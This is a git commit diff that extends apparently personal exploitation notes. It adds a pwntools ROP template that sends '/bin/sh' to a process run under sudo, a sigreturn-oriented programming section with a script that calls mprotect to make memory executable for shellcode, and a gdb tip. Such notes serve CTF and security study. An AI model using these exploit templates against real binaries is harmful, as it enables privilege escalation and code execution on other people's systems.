bump
This commit is contained in:
parent
e3b5eaf747
commit
363d96b77a
|
|
@ -3,9 +3,10 @@
|
||||||
## Usage
|
## Usage
|
||||||
|
|
||||||
* Find cyclic buffer size
|
* Find cyclic buffer size
|
||||||
* Find gadgets via `ropper` or even better `ropstar`
|
* Find gadgets via `ropper`, `ROPgadget --binary` or even better `ropstar`
|
||||||
|
|
||||||
## Example
|
## Example
|
||||||
|
|
||||||
```python
|
```python
|
||||||
from pwn import *
|
from pwn import *
|
||||||
|
|
||||||
|
|
@ -14,7 +15,6 @@ p = s.process(['sudo', '<process>'])
|
||||||
|
|
||||||
offset=<found_offset_len>
|
offset=<found_offset_len>
|
||||||
|
|
||||||
# take the ropchain from ropstar
|
|
||||||
payload = cyclic(offset)
|
payload = cyclic(offset)
|
||||||
payload += p64(0x4711)
|
payload += p64(0x4711)
|
||||||
payload += p64(0x235)
|
payload += p64(0x235)
|
||||||
|
|
@ -26,3 +26,59 @@ print(p.recv())
|
||||||
p.sendline("/bin/sh")
|
p.sendline("/bin/sh")
|
||||||
p.interactive(prompt='')
|
p.interactive(prompt='')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SIG ROP
|
||||||
|
|
||||||
|
Sigreturn oriented programming.
|
||||||
|
|
||||||
|
### What is it?
|
||||||
|
|
||||||
|
The manual for `sigreturn` states the following
|
||||||
|
|
||||||
|
> sigreturn, rt_sigreturn - return from signal handler and cleanup stack frame
|
||||||
|
|
||||||
|
Further, `mprotect` provides a writeable and executable memory segment. Even `NX` is nullified in this way and the stack will be executable.
|
||||||
|
|
||||||
|
From the `mprotect` manual
|
||||||
|
|
||||||
|
> The mprotect() function shall change the access protections to be that specified by prot for those whole pages containing any part of the address space of the process starting at address addr and continuing for len bytes.
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
|
||||||
|
First, use `mprotect` on a memory segment. Use the `Minimum Address` provided by a Ghidra import to get an address to write to.
|
||||||
|
|
||||||
|
```
|
||||||
|
ROPgadget ---binary <binary> | grep ": syscall"
|
||||||
|
```
|
||||||
|
|
||||||
|
Use this found address as a start to craft a frame via pwntools
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
context.clear(arch='amd64')
|
||||||
|
context.terminal = ["urxvt", "-e", "sh", "-c"]
|
||||||
|
p = process(<process>)
|
||||||
|
shellcode = <shellcode from shellstorm>
|
||||||
|
|
||||||
|
SYSCALL = <address found by ROPgadget previously>
|
||||||
|
|
||||||
|
VULERNERABLE_FUNCTION = p64(<vulnerable function address>)
|
||||||
|
VULERNABLE_POINTER = <Instruction Pointer to vulnerable function>
|
||||||
|
WRITEABLE_ADDRESS = <Minimum address provided by Ghidra import>
|
||||||
|
|
||||||
|
frame = SigreturnFrame(kernel="amd64")
|
||||||
|
frame.rax = 10 # mprotect syscall
|
||||||
|
frame.rdi = WRITEABLE_ADDRESS
|
||||||
|
frame.rsi = <stackframe size>
|
||||||
|
frame.rdx = 7 # rwx
|
||||||
|
frame.rsp = VULERNABLE_POINTER
|
||||||
|
frame.rip = SYSCALL
|
||||||
|
|
||||||
|
payload = b'A' * <found len> + VULERNERABLE_FUNCTION + p64(SYSCALL) + bytes(frame)
|
||||||
|
p.sendline(payload)
|
||||||
|
p.recv()
|
||||||
|
|
||||||
|
p.interactive(p) # or gdb.attach(p)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -6,3 +6,10 @@
|
||||||
```sh
|
```sh
|
||||||
p *(char **)$rax
|
p *(char **)$rax
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Show Instructions
|
||||||
|
|
||||||
|
Show the next 70 instructions under the current position
|
||||||
|
```sh
|
||||||
|
x/70i $pc
|
||||||
|
```
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue